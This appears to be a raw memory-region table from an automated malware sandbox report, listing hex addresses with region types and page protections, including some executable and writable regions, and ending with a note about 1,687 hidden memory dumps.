B70B000
stack
page read and write
CD92000
unkown
page read and write
7885000
stack
page read and write
2B59C6B0000
trusted library allocation
page read and write
1A600001000
trusted library allocation
page read and write
8A00000
unkown
page readonly
CEA7000
unkown
page read and write
375A000
stack
page read and write
344A000
stack
page read and write
7FF5BE8CE000
unkown
page readonly
CE18000
unkown
page read and write
39B1000
unkown
page read and write
CBAF000
unkown
page read and write
7FF5BE55D000
unkown
page readonly
B186000
unkown
page read and write
7FF5BE7E2000
unkown
page readonly
7FF5BE82C000
unkown
page readonly
AA90000
unkown
page read and write
7FF5BE9C6000
unkown
page readonly
57D6000
unkown
page read and write
144D000
trusted library allocation
page execute and read and write
C9346FE000
stack
page read and write
7FF5BE38B000
unkown
page readonly
398A000
unkown
page read and write
AB60000
unkown
page read and write
CE4000
heap
page read and write
9ADA000
unkown
page read and write
7FF5BE76E000
unkown
page readonly
12D0000
trusted library allocation
page execute and read and write
7A34000
unkown
page read and write
CE4000
heap
page read and write
B78C000
stack
page read and write
7FF5BE6B1000
unkown
page readonly
7FF5BE432000
unkown
page readonly
D099000
unkown
page read and write
7FF5BE3A2000
unkown
page readonly
7FFC3C7F2000
trusted library allocation
page read and write
C20000
trusted library allocation
page read and write
7A5A000
unkown
page read and write
61A433F000
stack
page read and write
7FF5BE71C000
unkown
page readonly
7FF5BE97A000
unkown
page readonly
1A600062000
trusted library allocation
page read and write
A9ED000
unkown
page read and write
8F00000
unkown
page readonly
AB52000
unkown
page read and write
7FF5BE695000
unkown
page readonly
99E5000
unkown
page read and write
A640000
unkown
page readonly
1A600159000
trusted library allocation
page read and write
7AA2000
unkown
page read and write
7FF5BE969000
unkown
page readonly
7FF5BE895000
unkown
page readonly
AB47000
unkown
page read and write
7FF5BE52C000
unkown
page readonly
10C54000
unkown
page read and write
7FF5BE873000
unkown
page readonly
78B0000
unkown
page read and write
C56F000
stack
page read and write
7FF5BE3F9000
unkown
page readonly
8C7F000
stack
page read and write
22D201B2000
heap
page read and write
7FF5BE2A3000
unkown
page readonly
8270000
unkown
page read and write
2B59EF12000
trusted library allocation
page read and write
ABBD000
unkown
page read and write
8A00000
unkown
page readonly
7FF5BE773000
unkown
page readonly
AA75000
unkown
page read and write
CE80000
unkown
page read and write
7FF5BE4EF000
unkown
page readonly
7FF5BE335000
unkown
page readonly
7FF5BE3CA000
unkown
page readonly
39D9000
unkown
page read and write
8EC0000
unkown
page read and write
7FF5BE729000
unkown
page readonly
2EBD000
unclassified section
page execute and read and write
1A6005A2000
trusted library allocation
page read and write
1A600111000
trusted library allocation
page read and write
CE4000
heap
page read and write
39A9000
unkown
page read and write
8199000
stack
page read and write
7F60000
unkown
page read and write
7FF5BE422000
unkown
page readonly
9A4D000
unkown
page read and write
7FF5BE4EF000
unkown
page readonly
9A46000
unkown
page read and write
7FF5BE285000
unkown
page readonly
B140000
unkown
page read and write
9016000
unkown
page read and write
2B5A1B5F000
trusted library allocation
page read and write
7FF5BE835000
unkown
page readonly
7FF5BEA66000
unkown
page readonly
31BD000
direct allocation
page execute and read and write
22D21ED1000
heap
page read and write
B7A0000
unkown
page readonly
1529000
stack
page read and write
DB0000
heap
page read and write
A233000
unkown
page read and write
D680000
unkown
page read and write
7FFC3C6F6000
trusted library allocation
page execute and read and write
3995000
unkown
page read and write
7FF5BE58E000
unkown
page readonly
7FF5BE47C000
unkown
page readonly
7FF5BE685000
unkown
page readonly
1A60011E000
trusted library allocation
page read and write
CD7E000
unkown
page read and write
CB6D000
unkown
page read and write
7BA3000
unkown
page read and write
7FF5BE779000
unkown
page readonly
335D000
direct allocation
page execute and read and write
1690000
heap
page read and write
7FF5BE93E000
unkown
page readonly
CB0B000
unkown
page read and write
AA08000
unkown
page read and write
CD43000
unkown
page read and write
1A67AE70000
heap
page read and write
7FF5BE41C000
unkown
page readonly
9659000
stack
page read and write
8AFE000
stack
page read and write
2B59C4B0000
heap
page read and write
8A60000
unkown
page readonly
9C28000
unkown
page read and write
12F0000
heap
page read and write
B7C0000
unkown
page read and write
7FF5BE857000
unkown
page readonly
7FF5BE50D000
unkown
page readonly
2B59C794000
heap
page read and write
3490000
unkown
page read and write
CD92000
unkown
page read and write
7FF5BE87F000
unkown
page readonly
7A44000
unkown
page read and write
7FF5BE6D0000
unkown
page readonly
D00F000
unkown
page read and write
37D0000
unkown
page read and write
12D0000
unkown
page read and write
7FF5BE7F7000
unkown
page readonly
12E1000
trusted library allocation
page execute and read and write
2F45000
heap
page read and write
C7FF000
stack
page read and write
7FF5BE85D000
unkown
page readonly
7A6A000
unkown
page read and write
3986000
unkown
page read and write
2FB0000
unkown
page read and write
7FF5BE98D000
unkown
page readonly
7FF5BE6BB000
unkown
page readonly
8AFE000
stack
page read and write
7AEB000
unkown
page read and write
CBCA000
unkown
page read and write
1A67CF66000
heap
page read and write
9DFA000
heap
page read and write
7DF4C97F1000
unkown
page execute read
7885000
stack
page read and write
7FFC3C920000
trusted library allocation
page read and write
CC6A000
unkown
page read and write
7FF5BE8C4000
unkown
page readonly
F410000
system
page execute and read and write
56E000
stack
page read and write
7FF5BE937000
unkown
page readonly
9221000
unkown
page read and write
7FF5BE39A000
unkown
page readonly
3141000
heap
page read and write
4D80000
unkown
page read and write
7FF5BE82C000
unkown
page readonly
C9343D3000
stack
page read and write
B8D0000
unkown
page read and write
CE4000
heap
page read and write
2B5A4D5F000
trusted library allocation
page read and write
9083000
unkown
page read and write
7890000
unkown
page read and write
F220000
unkown
page read and write
B1A2000
unkown
page read and write
A9E9000
unkown
page read and write
22D20179000
heap
page read and write
7FF5BE7FC000
unkown
page readonly
22D201A6000
heap
page read and write
C93487E000
stack
page read and write
8478000
stack
page read and write
CEF0000
unkown
page read and write
CAFF000
stack
page read and write
37D0000
unkown
page read and write
3649000
stack
page read and write
7FF5BE3A2000
unkown
page readonly
9C0B000
unkown
page read and write
D098000
unkown
page read and write
2F2A000
stack
page read and write
7FF5BE71F000
unkown
page readonly
7FF5BE9AD000
unkown
page readonly
7FFC3C620000
trusted library allocation
page read and write
9CEC000
unkown
page read and write
B790000
unkown
page read and write
9AB4000
unkown
page read and write
2B59C4F0000
heap
page read and write
2FAE000
stack
page read and write
7FFC3C8F0000
trusted library allocation
page read and write
22D201CA000
heap
page read and write
A539000
stack
page read and write
61A453E000
stack
page read and write
7FF5BE442000
unkown
page readonly
7FF5BE2A5000
unkown
page readonly
22D201B4000
heap
page read and write
2F46000
heap
page read and write
7F30000
unkown
page read and write
7FFC3C8C0000
trusted library allocation
page read and write
9AC2000
unkown
page read and write
7A54000
unkown
page read and write
ABBD000
unkown
page read and write
B8F0000
unkown
page read and write
2F4F000
heap
page read and write
CE4000
heap
page read and write
7A44000
unkown
page read and write
7FF5BE530000
unkown
page readonly
7A38000
unkown
page read and write
BD25000
stack
page read and write
7A30000
unkown
page read and write
CE0E000
unkown
page read and write
7FF5BE831000
unkown
page readonly
7F70000
unkown
page read and write
2B59E512000
trusted library allocation
page read and write
7FF5BE955000
unkown
page readonly
BB30000
unkown
page execute and read and write
7FF5BE45F000
unkown
page readonly
7FF5BEA32000
unkown
page readonly
37F6000
unclassified section
page read and write
7FF5BEA48000
unkown
page readonly
A9ED000
unkown
page read and write
D101000
unkown
page read and write
996A000
unkown
page read and write
9ACE000
unkown
page read and write
7A52000
unkown
page read and write
C6EA000
stack
page read and write
7C02000
unkown
page read and write
22D21EE2000
heap
page read and write
4EBA000
unkown
page read and write
9AC6000
unkown
page read and write
CEB2000
unkown
page read and write
4EBA000
unkown
page read and write
AA4D000
unkown
page read and write
3995000
unkown
page read and write
2B59C7D5000
heap
page read and write
AA44000
unkown
page read and write
7FF5BE442000
unkown
page readonly
8A30000
unkown
page readonly
9AB4000
unkown
page read and write
CB00000
unkown
page read and write
CE4000
heap
page read and write
7FF5BE7F4000
unkown
page readonly
7FF5BE6AE000
unkown
page readonly
7FF5BE927000
unkown
page readonly
1A67AEF0000
heap
page read and write
1A67AF82000
heap
page read and write
7A98000
unkown
page read and write
2B59C5CB000
heap
page read and write
DC0000
heap
page read and write
F310000
system
page execute and read and write
C93598E000
stack
page read and write
3090000
direct allocation
page execute and read and write
7A60000
unkown
page read and write
13D3000
heap
page read and write
35C9000
stack
page read and write
AA79000
unkown
page read and write
7A6A000
unkown
page read and write
8FCB000
stack
page read and write
22D2012B000
heap
page read and write
22D201E3000
heap
page read and write
D6B1000
unkown
page read and write
7FF5BE646000
unkown
page readonly
920C000
stack
page read and write
CE4000
heap
page read and write
D6BD000
unkown
page read and write
7A9E000
unkown
page read and write
C934E3B000
stack
page read and write
7FF5BE9E5000
unkown
page readonly
39A9000
unkown
page read and write
7FF5BE2A5000
unkown
page readonly
1275000
stack
page read and write
1A6001F6000
trusted library allocation
page read and write
D154000
unkown
page read and write
9CE2000
unkown
page read and write
7FFC3C810000
trusted library allocation
page read and write
7FF5BE831000
unkown
page readonly
ABAF000
unkown
page read and write
1690000
heap
page read and write
8A40000
unkown
page readonly
7FF5BE32D000
unkown
page readonly
1A67AE90000
heap
page read and write
7FF5BE1D5000
unkown
page readonly
7AEB000
unkown
page read and write
7FF5BE9DC000
unkown
page readonly
7FF5BE715000
unkown
page readonly
4EAA000
unkown
page read and write
7FF5BE417000
unkown
page readonly
CE4000
heap
page read and write
7ADF000
unkown
page read and write
FC0000
unkown
page readonly
7A84000
unkown
page read and write
1A67CFC5000
heap
page read and write
3549000
stack
page read and write
CE69000
unkown
page read and write
22D1FFB0000
heap
page read and write
22D20227000
heap
page read and write
4E0D000
unkown
page read and write
7FFC3C612000
trusted library allocation
page read and write
7FF5BE1DE000
unkown
page readonly
9B66000
unkown
page read and write
7FF5BE835000
unkown
page readonly
7A5C000
unkown
page read and write
CC6F000
unkown
page read and write
C934C3E000
stack
page read and write
7FF5BE4FE000
unkown
page readonly
CB79000
unkown
page read and write
7FF5BE996000
unkown
page readonly
7FF5BE927000
unkown
page readonly
8270000
unkown
page read and write
22D201B2000
heap
page read and write
B7B0000
unkown
page readonly
9B25000
unkown
page read and write
B180000
unkown
page read and write
9C22000
unkown
page read and write
398C000
unkown
page read and write
7BD7000
unkown
page read and write
7FF5BE9C9000
unkown
page readonly
7E70000
unkown
page read and write
1A67AFCD000
heap
page read and write
7FF5BE64E000
unkown
page readonly
7FF5BE6C7000
unkown
page readonly
CE4000
heap
page read and write
2B59E47B000
trusted library allocation
page read and write
7FF5BE397000
unkown
page readonly
304C000
unclassified section
page execute and read and write
7FF5BE565000
unkown
page readonly
7FF5BE72E000
unkown
page readonly
A610000
unkown
page readonly
97DA000
stack
page read and write
D6C6000
unkown
page read and write
D160000
unkown
page read and write
CBB9000
unkown
page read and write
51E000
unkown
page read and write
AA55000
unkown
page read and write
7FF5BE298000
unkown
page readonly
7FF5BE514000
unkown
page readonly
7DF4C9811000
unkown
page execute read
7FF5BE9EC000
unkown
page readonly
7FF5BE5A1000
unkown
page readonly
8A20000
unkown
page readonly
7FF5BE4E1000
unkown
page readonly
4DB9000
unkown
page read and write
61A3F7D000
stack
page read and write
C9348FE000
stack
page read and write
A9D8000
unkown
page read and write
7FF5BE955000
unkown
page readonly
3EDF000
unclassified section
page read and write
7FF5BE3CD000
unkown
page readonly
9DCD000
stack
page read and write
22D20120000
heap
page read and write
9AB1000
unkown
page read and write
7FFC3C613000
trusted library allocation
page execute and read and write
7FF5BE68A000
unkown
page readonly
7FFC3C8B0000
trusted library allocation
page read and write
3003000
heap
page read and write
CBE3000
unkown
page read and write
7FF5BEA40000
unkown
page readonly
AA92000
unkown
page read and write
22D20125000
heap
page read and write
2FC0000
unkown
page readonly
22D201B2000
heap
page read and write
CE18000
unkown
page read and write
7FF5BE4FE000
unkown
page readonly
7FF5BE2A3000
unkown
page readonly
22D2022E000
heap
page read and write
7FF5BE61F000
unkown
page readonly
7FF5BE6B3000
unkown
page readonly
22D201C8000
heap
page read and write
22D21ED3000
heap
page read and write
A9D5000
unkown
page read and write
38E0000
unkown
page readonly
CD7E000
unkown
page read and write
7FF5BE996000
unkown
page readonly
7FF5BE4CA000
unkown
page readonly
12B0000
unkown
page readonly
22D21EE2000
heap
page read and write
2B59E4BB000
trusted library allocation
page read and write
7FF5BE76B000
unkown
page readonly
7FF5BE85D000
unkown
page readonly
D155000
unkown
page read and write
D6E3000
unkown
page read and write
C93580E000
stack
page read and write
CE0E000
unkown
page read and write
7FF5BE828000
unkown
page readonly
CE4000
heap
page read and write
39B1000
unkown
page read and write
A560000
unkown
page read and write
9AB1000
unkown
page read and write
CB95000
unkown
page read and write
7FF5BE898000
unkown
page readonly
8020000
unkown
page readonly
7FF5AACAE000
unkown
page readonly
7FF5BE8BE000
unkown
page readonly
9B49000
unkown
page read and write
CE60000
unkown
page read and write
7FF5BE761000
unkown
page readonly
1A67B090000
heap
page read and write
AB5E000
unkown
page read and write
7FF5BE923000
unkown
page readonly
CE95000
unkown
page read and write
2F2CEFE000
stack
page read and write
9ADA000
unkown
page read and write
CE4000
heap
page read and write
3141000
heap
page read and write
CEB2000
unkown
page read and write
7FF5BE838000
unkown
page readonly
39D9000
unkown
page read and write
AB54000
unkown
page read and write
22D20128000
heap
page read and write
1A30000
unkown
page readonly
2FE0000
unkown
page readonly
8020000
unkown
page readonly
7BA3000
unkown
page read and write
22D201E2000
heap
page read and write
4D7B000
unkown
page read and write
16A0000
unkown
page readonly
2E40000
unkown
page readonly
2EF0000
trusted library allocation
page read and write
9999000
unkown
page read and write
2F49000
heap
page read and write
7FF5BE9C6000
unkown
page readonly
B70B000
stack
page read and write
1A67AF7D000
heap
page read and write
61A46BB000
stack
page read and write
3000000
heap
page read and write
7FF5BEA35000
unkown
page readonly
CE69000
unkown
page read and write
39B3000
unkown
page read and write
2B59C676000
heap
page read and write
CE4000
heap
page read and write
7DF4C97E0000
unkown
page readonly
7FF5BEA54000
unkown
page readonly
2B59C570000
trusted library allocation
page read and write
7FF5BE4C3000
unkown
page readonly
D075000
unkown
page read and write
7FFC3C910000
trusted library allocation
page read and write
CB85000
unkown
page read and write
7FF5BE889000
unkown
page readonly
920B000
stack
page read and write
BE2A000
stack
page read and write
38F0000
unkown
page read and write
7FF5BE618000
unkown
page readonly
10D96000
system
page read and write
AA55000
unkown
page read and write
A3BD000
stack
page read and write
7FF5BE5F9000
unkown
page readonly
CB7D000
unkown
page read and write
7FF5BE41C000
unkown
page readonly
C6EA000
stack
page read and write
2FA5000
unclassified section
page execute and read and write
D134000
unkown
page read and write
7FF5BE886000
unkown
page readonly
BC4D000
unkown
page execute and read and write
2B59C790000
heap
page read and write
7FF5BE9BE000
unkown
page readonly
7FF5BE4B5000
unkown
page readonly
9DF0000
heap
page read and write
CB50000
unkown
page read and write
3780000
unkown
page readonly
22D201E3000
heap
page read and write
A9F0000
unkown
page read and write
B1FB000
unkown
page read and write
B920000
unkown
page read and write
A9E9000
unkown
page read and write
7FF5BE9EC000
unkown
page readonly
8F40000
heap
page read and write
CBC7000
unkown
page read and write
B640000
unkown
page readonly
CE60000
unkown
page read and write
1A67CB10000
heap
page execute and read and write
7FF5BE415000
unkown
page readonly
CE4000
heap
page read and write
7FF5BE9CD000
unkown
page readonly
4D82000
unkown
page read and write
2D60000
unclassified section
page execute and read and write
2B59FD5F000
trusted library allocation
page read and write
3003000
heap
page read and write
9964000
unkown
page read and write
CB68000
unkown
page read and write
AA29000
unkown
page read and write
E4C000
system
page execute and read and write
2B59C550000
trusted library allocation
page read and write
7DF4C97F0000
unkown
page readonly
93B8000
stack
page read and write
1A67AFD9000
heap
page read and write
7FF5BE618000
unkown
page readonly
10CDB000
unkown
page read and write
7FFC3C730000
trusted library allocation
page execute and read and write
7FF5BE430000
unkown
page readonly
7FF5BE523000
unkown
page readonly
2F49000
heap
page read and write
C20000
trusted library allocation
page read and write
7FF5BE4B5000
unkown
page readonly
1A67C9E5000
heap
page read and write
7FFC3C7B0000
trusted library allocation
page read and write
7FF5AACB4000
unkown
page readonly
B40000
heap
page read and write
AB2D000
unkown
page read and write
376D000
direct allocation
page execute and read and write
2B59C5D1000
heap
page read and write
4E60000
unkown
page read and write
FD0000
unkown
page readonly
C20000
trusted library allocation
page read and write
CEF8000
unkown
page read and write
7FF5BE28F000
unkown
page readonly
CE4000
heap
page read and write
8A40000
unkown
page readonly
7DF4C9811000
unkown
page execute read
7FF5BE75C000
unkown
page readonly
2B59C3B0000
heap
page read and write
7FF5BE4E7000
unkown
page readonly
1A67CF19000
heap
page read and write
826E000
stack
page read and write
7FF5BE3DF000
unkown
page readonly
7DF4DEC80000
trusted library allocation
page execute and read and write
7A54000
unkown
page read and write
CB93000
unkown
page read and write
9CE2000
unkown
page read and write
9B06000
unkown
page read and write
1A60051B000
trusted library allocation
page read and write
22D201E3000
heap
page read and write
7FFC3C61D000
trusted library allocation
page execute and read and write
7A7C000
unkown
page read and write
CB5C000
unkown
page read and write
7FF5BE6D3000
unkown
page readonly
1275000
stack
page read and write
7AEB000
unkown
page read and write
35CD000
direct allocation
page execute and read and write
3341000
direct allocation
page execute and read and write
B7C0000
unkown
page read and write
400000
heap
page read and write
7FF5BE73E000
unkown
page readonly
7FF5BE72E000
unkown
page readonly
57AA000
unkown
page read and write
CB87000
unkown
page read and write
7FF5BE4C6000
unkown
page readonly
34A0000
direct allocation
page execute and read and write
7FF5BE9AD000
unkown
page readonly
1641000
unkown
page readonly
7FFC3C8E0000
trusted library allocation
page read and write
2B59C560000
heap
page readonly
C4EB000
stack
page read and write
7FFC3C8A0000
trusted library allocation
page read and write
AA4D000
unkown
page read and write
837D000
stack
page read and write
12C0000
heap
page read and write
8DF8000
stack
page read and write
7FF5BE72C000
unkown
page readonly
7FF5BE44D000
unkown
page readonly
22D201DC000
heap
page read and write
7FF5BE857000
unkown
page readonly
9C20000
unkown
page read and write
9C06000
unkown
page read and write
2FAE000
stack
page read and write
CB79000
unkown
page read and write
9C28000
unkown
page read and write
1A67B010000
trusted library allocation
page read and write
2B59E4BD000
trusted library allocation
page read and write
7FF5BE43B000
unkown
page readonly
ABAF000
unkown
page read and write
4E9A000
unkown
page read and write
2B59E497000
trusted library allocation
page read and write
61A3EFE000
stack
page read and write
3140000
heap
page read and write
2B59C5D7000
heap
page read and write
1147F000
system
page read and write
7C1D000
unkown
page read and write
7FF5BEA59000
unkown
page readonly
22D21EEE000
heap
page read and write
1A67D3F0000
heap
page read and write
D4C000
stack
page read and write
2F5D000
heap
page read and write
97E0000
unkown
page readonly
7FF5BE64C000
unkown
page readonly
CB60000
unkown
page read and write
39AF000
unkown
page read and write
7F60000
unkown
page read and write
CCBC000
unkown
page read and write
C20000
trusted library allocation
page read and write
7FF5BE0E7000
unkown
page readonly
7FF5BE7E8000
unkown
page readonly
7FF5BE39A000
unkown
page readonly
9AC2000
unkown
page read and write
7FF5BE64A000
unkown
page readonly
9C22000
unkown
page read and write
2B59C5ED000
heap
page read and write
5F70000
trusted library allocation
page read and write
37A0000
unkown
page readonly
22D201F3000
heap
page read and write
C20000
trusted library allocation
page read and write
149A000
heap
page read and write
22D201D7000
heap
page read and write
2B59C490000
heap
page read and write
CC6A000
unkown
page read and write
1A67CF1F000
heap
page read and write
7ADF000
unkown
page read and write
7FF5BE9E8000
unkown
page readonly
7FF5BE9FB000
unkown
page readonly
7FF5BEA60000
unkown
page readonly
13CD000
heap
page read and write
D154000
unkown
page read and write
9AF0000
unkown
page read and write
61A427E000
stack
page read and write
A540000
unkown
page read and write
7FF5BE810000
unkown
page readonly
7FF5BE4E3000
unkown
page readonly
38D3000
stack
page read and write
2FC0000
unkown
page readonly
4E80000
unkown
page read and write
3141000
heap
page read and write
C934D3E000
stack
page read and write
1A67AED0000
heap
page read and write
AA92000
unkown
page read and write
22D201F3000
heap
page read and write
9D37000
unkown
page read and write
5A0000
heap
page read and write
2B59C617000
heap
page read and write
7FF5BE6BB000
unkown
page readonly
C9FB000
stack
page read and write
2B5A075F000
trusted library allocation
page read and write
CBBE000
unkown
page read and write
B186000
unkown
page read and write
C97C000
stack
page read and write
7B53000
unkown
page read and write
2B59C5CD000
heap
page read and write
39F0000
unkown
page readonly
D6DF000
unkown
page read and write
CB75000
unkown
page read and write
3857000
stack
page read and write
CE4000
heap
page read and write
3790000
unkown
page read and write
1A600121000
trusted library allocation
page read and write
9C0B000
unkown
page read and write
CEB2000
unkown
page read and write
7FF5BE815000
unkown
page readonly
7FF5BE4E1000
unkown
page readonly
7FF5BE7D8000
unkown
page readonly
7FF5BE65C000
unkown
page readonly
39A2000
unkown
page read and write
AB50000
unkown
page read and write
22D201C4000
heap
page read and write
7FF5BE8CE000
unkown
page readonly
375A000
stack
page read and write
9950000
unkown
page read and write
2B59DFD4000
heap
page read and write
33CA000
stack
page read and write
1A67B095000
heap
page read and write
39AB000
unkown
page read and write
CC76000
unkown
page read and write
7FF5BE695000
unkown
page readonly
7FF5BE923000
unkown
page readonly
D6DF000
unkown
page read and write
7FF5BE975000
unkown
page readonly
7FF5BE5B1000
unkown
page readonly
7A9E000
unkown
page read and write
2B59DFD6000
heap
page read and write
BEAB000
stack
page read and write
AA3C000
unkown
page read and write
7FF5BE973000
unkown
page readonly
7DF4C97F0000
unkown
page readonly
7FF5BE38B000
unkown
page readonly
CBC7000
unkown
page read and write
837D000
stack
page read and write
B180000
unkown
page read and write
2F49000
heap
page read and write
7A68000
unkown
page read and write
7FF5BE4A7000
unkown
page readonly
83FE000
stack
page read and write
BD25000
stack
page read and write
81B0000
unkown
page readonly
39AD000
unkown
page read and write
7FF5BE911000
unkown
page readonly
2F3E000
heap
page read and write
CE4000
heap
page read and write
22D201BC000
heap
page read and write
398A000
unkown
page read and write
7FFC3C890000
trusted library allocation
page read and write
12E0000
heap
page read and write
CE0E000
unkown
page read and write
39F0000
unkown
page readonly
CE4000
heap
page read and write
7FF5BE889000
unkown
page readonly
7FF5BE5D8000
unkown
page readonly
22D201F3000
heap
page read and write
1A610074000
trusted library allocation
page read and write
9D0000
heap
page read and write
1A67AF35000
heap
page read and write
22D201F3000
heap
page read and write
7FF5BE886000
unkown
page readonly
7FF5BEA18000
unkown
page readonly
2F4F000
heap
page read and write
D134000
unkown
page read and write
7FF5BE989000
unkown
page readonly
12D0000
unkown
page read and write
7FF5BE498000
unkown
page readonly
8F40000
heap
page read and write
A610000
unkown
page readonly
D6B5000
unkown
page read and write
4EC0000
unkown
page read and write
AB47000
unkown
page read and write
7FF5BE457000
unkown
page readonly
C20000
trusted library allocation
page read and write
2B59C5D3000
heap
page read and write
2B59DFD9000
heap
page read and write
CB8F000
unkown
page read and write
7FF5BE7FC000
unkown
page readonly
7FF5BE810000
unkown
page readonly
4DD1000
unkown
page read and write
7FFC3C7C1000
trusted library allocation
page read and write
1A67C9EB000
heap
page read and write
7FF5BE6A1000
unkown
page readonly
7FF5BE5B1000
unkown
page readonly
8A20000
unkown
page readonly
97F0000
unkown
page readonly
7FF5BE6B3000
unkown
page readonly
1A67D120000
heap
page read and write
38F0000
unkown
page read and write
7FFC3C8D0000
trusted library allocation
page read and write
7FF5BE8B4000
unkown
page readonly
19D000
stack
page read and write
9CDE000
unkown
page read and write
7DF4C97D1000
unkown
page execute read
4E07000
unkown
page read and write
331E000
stack
page read and write
7A3A000
unkown
page read and write
2F2D0FB000
stack
page read and write
1A67CF68000
heap
page read and write
AA8E000
unkown
page read and write
1A67AF39000
heap
page read and write
7FF5BEA60000
unkown
page readonly
7FFC3C6D0000
trusted library allocation
page execute and read and write
D096000
unkown
page read and write
7FF5BE616000
unkown
page readonly
7FF5BE808000
unkown
page readonly
B1A2000
unkown
page read and write
12E9000
heap
page read and write
5F70000
trusted library allocation
page read and write
6AF000
unkown
page read and write
3790000
unkown
page read and write
7FF5BE64C000
unkown
page readonly
1A60044D000
trusted library allocation
page read and write
CE4000
heap
page read and write
BEAB000
stack
page read and write
2B5A575F000
trusted library allocation
page read and write
1A67CFE2000
heap
page read and write
81A0000
unkown
page read and write
C5E8000
stack
page read and write
CBB9000
unkown
page read and write
7FF5BEA18000
unkown
page readonly
12C0000
heap
page read and write
22D201E3000
heap
page read and write
7FF5BE4CA000
unkown
page readonly
2DA0000
unclassified section
page execute and read and write
7FF5BE828000
unkown
page readonly
3130000
heap
page read and write
CE4000
heap
page read and write
2B59E105000
trusted library allocation
page read and write
996A000
unkown
page read and write
10CDB000
unkown
page read and write
4EAA000
unkown
page read and write
2E61000
trusted library allocation
page execute and read and write
7FF5BE0CC000
unkown
page readonly
2EF0000
trusted library allocation
page read and write
7FF5BE808000
unkown
page readonly
7FF5BE86B000
unkown
page readonly
A539000
stack
page read and write
10C54000
unkown
page read and write
B20B000
unkown
page read and write
12E0000
heap
page read and write
7FF5BE5D2000
unkown
page readonly
7FF5BE530000
unkown
page readonly
A2BD000
stack
page read and write
7FF5BE92F000
unkown
page readonly
7A34000
unkown
page read and write
7FF5BE445000
unkown
page readonly
7DF4C97D1000
unkown
page execute read
7FF5BE9FB000
unkown
page readonly
3271000
heap
page read and write
FD0000
unkown
page readonly
CE69000
unkown
page read and write
399A000
unkown
page read and write
4D68000
unkown
page read and write
1A6003DA000
trusted library allocation
page read and write
CE4000
heap
page read and write
There are 1687 hidden memdumps, click here to show them.